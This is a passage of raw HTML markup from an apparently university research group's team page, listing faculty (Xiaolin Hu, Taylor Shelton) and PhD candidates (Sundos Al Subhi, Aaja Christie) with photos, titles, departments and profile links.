             </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c61\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c61 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c122\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c122 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c123-outer\">\n            <div data-colibri-id=\"182-c123\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c123 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-862 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c62\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c62 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c63-outer\">\n            <div data-colibri-id=\"182-c63\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c63 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c64\" class=\"d-block style-854 style-local-182-c64 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sundos_Al_Subhi-1.jpg\" class=\"wp-image-1592 style-854-image style-local-182-c64-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c64-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c65\" class=\"h-global-transition-all h-heading style-850 style-local-182-c65 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c65\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c66\" class=\"h-text h-text-component style-851 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c67\" class=\"h-text h-text-component style-902 style-local-182-c67 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c68\" class=\"style-855 style-local-182-c68 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-849 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-901 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-853 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon 